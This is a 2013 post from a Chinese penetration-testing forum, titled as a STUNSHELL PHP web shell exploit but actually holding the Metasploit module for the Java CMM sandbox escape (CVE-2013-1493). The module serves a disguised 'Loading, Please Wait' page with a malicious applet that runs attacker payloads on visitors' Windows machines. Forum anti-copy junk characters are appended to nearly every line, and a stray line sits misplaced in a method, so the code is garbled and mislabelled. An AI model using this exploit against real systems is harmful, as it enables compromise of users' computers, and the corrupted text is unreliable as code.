中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]
作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##8 r- i% L. G& R
- ?% d( P1 ?8 L1 P  T* `
# This file is part of the Metasploit Framework and may be subject to
5 s  F& v5 P' Q& o& P/ \# redistribution and commercial restrictions. Please see the Metasploit
/ i4 c3 E) h. h( B" ?# K# web site for more information on licensing and terms of use.
! p4 ~7 o: ^9 m% q5 f# http://metasploit.com/: B/ d7 X* a- b
##
9 Y( b# H1 X. p& Z8 A% Brequire ‘msf/core’
' ~3 r+ J2 S1 grequire ‘rex’8 P6 i7 @4 R6 b& \* N' b* e
class Metasploit3 < Msf::Exploit::Remote) @1 t5 c0 c# K& {' n/ N; o& \  @
Rank = NormalRanking: z% |% [; c2 Z2 R% S
include Msf::Exploit::Remote::HttpServer::HTML8 I, y1 I2 d) w/ k
include Msf::Exploit::EXE
; s# k$ p. F4 S# F) W% D+ }* G6 |include Msf::Exploit::Remote::BrowserAutopwn
3 i0 [2 a' w' y' Pautopwn_info({ :javascript => false })2 M6 Q0 j9 l+ Z
def initialize( info = {} )
0 L4 C( T+ f/ }' I" m$ ysuper( update_info( info,
  g3 v) |& h' }# |‘Name’ => ‘Java CMM Remote Code Execution’,
, \9 n9 g4 }1 ?‘Description’ => %q{
; V! E) m& w7 w: m9 ^, nThis module abuses the Color Management classes from a Java Applet to run, `5 \' ^  X; P7 h, l
arbitrary Java code outside of the sandbox as exploited in the wild in February
" h: a) S% J5 Jand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41- Q3 \0 a$ e6 Y/ X
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
. v+ l& V1 z( W" P' @8 b1 G6 P( L8 Msystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
) W. a" @- E/ w4 \* n- B8 ^warning in order to run the malicious applet.
* E+ [$ S  }. i+ ^},
5 J. `! e. e4 f9 }  h+ k‘License’ => MSF_LICENSE,( s& u+ l7 \; @5 t7 F2 s8 z/ k% R
‘Author’ =>
$ Z; G$ U$ s7 v/ C'Unknown', # Vulnerability discovery and Exploit' \* j+ [7 `# ^4 y6 D  E0 [  e  e
'juan vazquez' # Metasploit module (just ported the published exploit)9 l2 b6 h; W& x  f
],
8 E& V4 D4 s" C1 F1 m" a‘References’ =>0 b  J) u+ ]! `* x3 ^2 B! Z
[
8 P3 w9 \# C& Z' M& L[ 'CVE', '2013-1493' ],3 T' h  o# J+ k0 d* M% V4 \) I: u
[ 'OSVDB', '90737' ],6 r: Y  L+ ?: _6 _: B( m9 p) S
[ 'BID', '58238' ],
. n% A0 A$ D( T. h' b[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
  H) S. p' `8 y/ M# `, j[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
1 ~' n( ]' o- }! D" q' s% M[ 'URL', 'http://pastie.org/pastes/6581034' ]* b; C, \, s: i1 Y* e- n! z* \% {
],
' i6 w$ e. a  r7 g& O‘Platform’ => [ 'win', 'java' ],
  `# c$ }: O6 J1 M' A0 q/ x‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
: e* U$ X) h6 P7 T‘Targets’ =>( @1 T" {9 w" {5 Q
[* `9 m( E; F0 j( a2 _
[ 'Generic (Java Payload)',3 q9 v$ E. b' b1 V+ F3 J" A
{1 S9 {" m7 N/ \/ M5 D( N
'Platform' => 'java',
0 e; h5 `4 ?7 Y( m3 Q'Arch' => ARCH_JAVA2 l! J0 U9 W! E
}
9 e* x3 v3 _. n( N! `],
! u- b6 M. Y1 H[ 'Windows x86 (Native Payload)',6 V6 J2 @% Z, n7 b  n
{
. f' E" L8 R  l'Platform' => 'win',+ ]; s5 X- H" i( [
'Arch' => ARCH_X869 D4 G" o) g' y. U4 T
}7 Z9 C" j  x" R' N% ]( t8 e" K) u
]5 c8 _$ I) O' ?
],
5 s2 p% K& I6 R" Y  Y$ q‘‘DisclosureDate’ => ‘Mar 01 2013′8 ?  V" z2 M# U! T! _! i
))
0 ]8 \# i9 ~8 @# {# q/ M: Lend6 Q" u* b. J0 x7 t/ r2 m
def setup# d8 F2 T+ K' ~" R- [1 C$ ~$ g: B
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)( ?, c; g0 N  Q1 h
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }( X- X% E0 S0 @) f
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”). c% {2 T2 [+ J3 J) U
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }2 q! d, T  Q0 e& x8 I% ?. b1 U
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
* P  p: W0 q8 x@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 ^2 U$ w3 R) g% V6 j" S: Gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
3 v/ o/ `: D( T. v9 B# j2 a" e" {, S@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; {8 y' F8 M7 o" B/ [@init_class_name = rand_text_alpha(“Init”.length), l3 S; Y; r7 T3 c( v
@init_class.gsub!(“Init”, @init_class_name)
, Y$ M* |, k* `$ ssuper
0 f; B, ~/ I5 r" g* nend0 ]) i* D# t" B4 E/ o5 T
def on_request_uri(cli, request)
0 f: }6 ^5 f( h# [print_status(“handling request for #{request.uri}”)
2 J! |: a! D$ m1 F- pcase request.uri
. H' O3 O( m  p- L- Ywhen /\.jar$/i
& }: |* P/ w# e2 Z2 L7 |jar = payload.encoded_jar
0 e, ^3 g# o8 @; d- k" c; M4 h" H2 X7 Yjar.add_file(“#{@init_class_name}.class”, @init_class)
3 F* Q5 g" W/ }6 ujar.add_file(“Leak.class”, @leak_class)2 g. r6 _+ o& v# i& a. T8 W
jar.add_file(“MyBufferedImage.class”, @buffered_image_class). Z4 g: h' r% H% W/ a
jar.add_file(“MyColorSpace.class”, @color_space_class)
/ f! r6 @) B; m9 l( C8 N; TDefaultTarget’ => 1,5 t9 u( z) p( p) y4 x
metasploit_str = rand_text_alpha(“metasploit”.length)9 H, ?/ Y, `  u' o
payload_str = rand_text_alpha(“payload”.length), M! {& M7 S/ |6 a/ ]
jar.entries.each { |entry|4 Z) h0 Y9 y  L4 |
entry.name.gsub!(“metasploit”, metasploit_str)# A& D# a; r8 E6 d& i9 Y: L" U8 N
entry.name.gsub!(“Payload”, payload_str)
( z4 N; W% m( centry.data = entry.data.gsub(“metasploit”, metasploit_str)4 P3 _# [0 ?4 R6 r% D6 v  r
entry.data = entry.data.gsub(“Payload”, payload_str)
% ~- i( Q/ M* I* r& B, }}/ @4 _" B9 ^2 x1 p  A5 }- d
jar.build_manifest+ Q2 c+ U4 I# n5 X) z* ~* R  ^
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })% G/ n1 J) |& u0 s  P+ W! x& x
when /\/$/
6 M1 h0 P3 T1 H! b/ ?* \6 Q& tpayload = regenerate_payload(cli)8 }1 _9 P, L3 A; [- @7 M
if not payload
$ }$ D8 h: N# _& b' {4 Jprint_error(“Failed to generate the payload.”)
  I5 `0 N0 J+ e$ A6 k$ Hsend_not_found(cli), I- y" z3 y  W+ T3 ?* p
return" s. F3 A+ H" p7 Y, t- z" g
end
6 ]5 ]- y5 Z2 H, V( Rsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
  @2 p/ m+ B" D9 t, T: lelse
7 u- w& H6 Y8 _- Csend_redirect(cli, get_resource() + ‘/’, ”)
1 M. V# ~( [$ Z# i# [. O# ~# Pend: c- m- `, F( L, [% y; H+ M6 f& \- k
end
" _2 ~; r' U) s; Cdef generate_html- `' f( M) f5 y* ?6 ~
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|+ T, @; R/ \, y/ [/ n7 W" \
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
; D- ]) e3 K9 H* Y$ ~8 v* s( rhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
! E" R8 [/ A& z3 v- T" B: P! q. M. [html += %Q|</applet></body></html>|/ Y4 |1 Q$ Z4 u; B  u! y% w4 C
return html0 w; T" t8 M- q/ {* k4 d: d8 Z
end, f$ P3 |" K9 D! m; O# i/ ]' Z
end
! s8 E$ z8 r( X- T  Mend
: @! i0 K& i* @9 `3 y+ C



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2